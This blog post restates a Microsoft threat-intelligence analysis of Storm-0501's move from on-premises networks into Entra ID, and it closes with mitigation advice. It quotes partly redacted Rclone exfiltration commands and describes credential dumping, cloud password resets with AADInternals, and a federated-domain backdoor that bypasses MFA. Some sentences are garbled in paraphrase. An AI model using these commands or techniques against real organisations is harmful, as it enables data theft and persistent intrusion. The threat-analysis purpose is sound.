Cyber security is a process of protecting sensitive data, networks, and software applications from cyber attacks. Cyber attacks can include resource exploitation, unauthorized access to systems, and ransomware attacks to encrypt data and extract money.
The days when it was enough only to have a strong password are long gone, and our personal and work data is exposed to many dangers. Why is it so important to protect it? Not only it is crucial to know what cyber security is, but also to understand why it is important.
Storm-0501: Attacks involving ransomware expanding to hybrid cloud environments
Threat actor Storm-0501 is the most recent one to be seen moving from on-premises systems in enterprises to cloud environments by taking advantage of weak credentials and over-privileged accounts. Once they had control of the network thanks to credentials they had stolen, they were able to install ransomware on the on-premises computers and create a persistent backdoor entrance to the cloud. Targeting both on-premises and cloud settings, Microsoft has previously seen threat actors like Octo Tempest and Manatee Tempest take use of the interfaces between the environments to further their objectives.
Analysis of the recent Storm-0501 campaign
Storm-0501, a cyber threat actor, gained initial access to a network through intrusions facilitated by access brokers like Storm-0249 and Storm-0900. They exploited vulnerabilities in Zoho ManageEngine, Citrix NetScaler, and ColdFusion 2016 applications. These initial access techniques, combined with insufficient operational security practices by the targets, allowed the threat actor to gain administrative privileges on the target device. After gaining access, the threat actor conducted extensive discovery to identify high-value assets and domain information. Common native Windows tools and open-source tools were used to query endpoint information. The threat actor also used an obfuscated version of ADRecon.ps1 for Active Directory reconnaissance. Following initial access, the threat actor deployed remote monitoring and management tools to maintain persistence.
Credential access and lateral movement
The threat actor utilized admin privileges on local devices to access credentials and gain more accounts within the network. They primarily used Impacket’s SecretsDump module to extract credentials and accessed more devices to collect additional credentials. The threat actor also attempted to gather secrets by reading sensitive files and extracting KeePass secrets from compromised devices. They engaged in brute force activity to gain specific account credentials and used Cobalt Strike for lateral movement across the network. The threat actor communicated with endpoints using Cobalt Strike’s command-and-control capabilities, utilizing .dll and .ocx files launched by rundll32.exe and regsvr32.exe, with a unique “license_id” of “666”. By compromising Domain Admin credentials and accessing a Domain Controller, the threat actor was able to deploy ransomware across the networked devices.
Data collection and exfiltration
It was seen that the threat actor was stealing private information from devices that were affected. The threat actor altered the data to recognize Windows binary names or variants on them, such as svhost.exe or scvhost.exe, as a masking technique in order to exfiltrate the data using the open-source application Rclone. The threat actor utilized the renamed Rclone binaries to send data to the cloud by means of a special configuration that synced files across several threads to public cloud storage services like MegaSync. To illustrate this behavior, the threat actor utilized the following command line examples:
Svhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11
scvhost.exe –config C:\Windows\Debug\a.conf copy [REDACTED UNC PATH] [REDACTED]
Defense evasion
The threat actor tried to avoid being discovered by manipulating security features on some of the devices they had physical access to. To avoid detection, they utilized an open-source tool, PowerShell cmdlets, and pre-existing binaries. In certain instances, they modified security products by manipulating distributed Group Policy Object (GPO) settings.
On-premises to cloud pivot
Our observations of Storm-0501’s tactics throughout their most recent assault revealed a change. The threat actor exploited the credentials, especially Microsoft Entra ID (previously Azure AD), that were taken from earlier in the assault to migrate laterally from the on-premises to the cloud environment and create permanent access to the target network through a backdoor.
The following attack vectors and on-premises pivot points were found to be used by Storm-0501 in order to eventually take control of Microsoft Entra ID.
Microsoft Entra Connect, formerly Azure AD Connect, is an essential Microsoft tool for syncing passwords and confidential information between on-premises Active Directory (AD) and Microsoft Entra ID objects. It synchronizes a person’s on-site and Entra identities, enabling them to utilize identical passwords for both domains. For security purposes, deployment necessitates installation on either an on-premises server or an Azure VM. Microsoft suggests setting up on a server that is part of a domain and has limited administrative privileges to avoid security breaches. Microsoft Incident Response offers advice on safeguarding cloud identity security. The Sync component handles data synchronization between on-premises and Entra environments by establishing service accounts with customized permissions for each realm. Microsoft has made modifications to permissions in order to improve security and prevent misuse. To access specific links for detailed permissions and configuration information.
Cloud session hijacking of on-premises user account
A potential way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account with a cloud account. In some cases, a compromised Domain Admin account had a Global Administrator role in Microsoft Entra ID, with multi factor authentication disabled. However, the sync service is unavailable for administrative accounts in Microsoft Entra, so passwords and data are not synced. If the passwords are the same or obtainable through on-premises credential theft techniques, a pivot is possible. If the compromised account is not assigned an administrative role in Microsoft Entra ID and synced to the cloud without security boundaries like MFA or Conditional Access, the threat actor can escalate to the cloud through known passwords, unknown passwords, or setting the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet. If MFA is enabled, authentication requires tampering with the MFA or gaining control of a user’s device. Microsoft is rolling out additional tenant-level security measures to increase security for admin accounts.
The threat actor could escalate to the cloud through the following:
- If the password is known, then logging in to Microsoft Entra is possible from any device.
- If the password is unknown, the threat actor can reset the on-premises user password, and after a few minutes, the new password will be synced to the cloud.
- If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet.
Cloud compromise leading to the backdoor
A threat actor successfully migrated from an on-premises environment to the cloud using compromised Microsoft Entra Connect Sync user accounts or cloud admin accounts. They connected to Microsoft Entra from any device using a privileged Microsoft Entra ID account, such as a Global Administrator. The attacker created persistent backdoor access by creating a new federated domain in the tenant, allowing them to sign in as any user of the Microsoft Entra ID tenant. The attacker used the open-source tool AADInternals and its Microsoft Entra ID capabilities to create the backdoor. The attacker first needed a domain registered to Microsoft Entra ID and then determined if the target domain was managed or federated. If managed, they converted the domain to a federated one and provided a root certificate for future tokens. Once a backdoor domain was available, the attacker created a federation trust between the compromised tenant and their own tenant. They used AADInternals commands to create Security Assertion Markup Language (SAML) tokens, which can be used to impersonate any user and bypass MFA to sign in to any application.
On-premises compromise leading to ransomware
The threat actor successfully extracted sensitive files from a network and moved them to the cloud, then deployed Embargo ransomware across the organization. The ransomware group behind Embargo uses advanced encryption methods and operates under the RaaS model. Affiliates like Storm-0501 use the platform to launch attacks in exchange for a ransom. In cases observed by Microsoft, the threat actor used compromised Domain Admin accounts to distribute the ransomware via a scheduled task called “SysUpdate” on network devices. The encrypted files were then encrypted and changed to. partial,.564ba1, and embargo.
Mitigation and protection guidance
As part of continuing security hardening, Microsoft has changed Microsoft Entra ID to restrict permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync. This modification helps prevent threat actors from misusing Directory Synchronization Accounts in attacks. For general ransomware attack hardening advice, users may also consult Microsoft’s human-operated ransomware overview.
The following security precautions can help reduce the impact of the additional tactics that threat actors employ and that this blog discusses:
- Use the least privilege approach and audit privileged account activity in your Microsoft Entra ID installations to secure accounts and thwart attackers.
- Turn on conditional access policies. Each time a user tries to log in, conditional access restrictions are assessed and applied.
- Employers and external users of essential apps should be required to provide phishing-resistant authentication by implementing Conditional Access authentication strength.
- When federated with Microsoft Entra ID, enable protection to prevent cloud Microsoft Entra MFA by-passing.
- If you want to prevent attempts to use SAML tokens to sign in to any non-federated domain (such as.onmicrosoft.com), set the validatingDomains attribute of the federatedTokenValidationPolicy to “all.”
- To avoid attackers from interrupting security services like Microsoft Defender for Endpoint, which can assist prevent hybrid cloud environment assaults like Microsoft Entra Connect misuse, turn on tamper protection measures. When Microsoft Defender Antivirus is in passive mode or your non-Microsoft antivirus is not detecting the threat, run endpoint detection and response (EDR) in block mode to enable Defender for Endpoint to stop harmful artifacts. Turn on investigation and remediation in full automatic mode to allow Defender for Endpoint to take rapid action on alerts to assist resolve alarms, greatly lowering alert volume.
Threat intelligence reports
Microsoft Defender Threat Intelligence offers customers up-to-date information on threat actors, malicious activity, and techniques, providing intelligence, protection information, and recommended actions to prevent, mitigate, or respond to threats found in customer environments.
“Security is always excessive until it’s not enough.” — Robbie Sinclair Cyber security is one of the most important aspects of the fast-paced growing digital world. The threats are hard to deny, so it is crucial to learn how to defend ourselves from them and teach others how to do it too.
Abhinav Ankit, a Digital and Cyber security analyst and a Law student specializing in “Digital Forensics” writes on the topic of Digital Security / Cyber Security, especially concerning emerging new threats and the precautions one can take to secure oneself digitally.
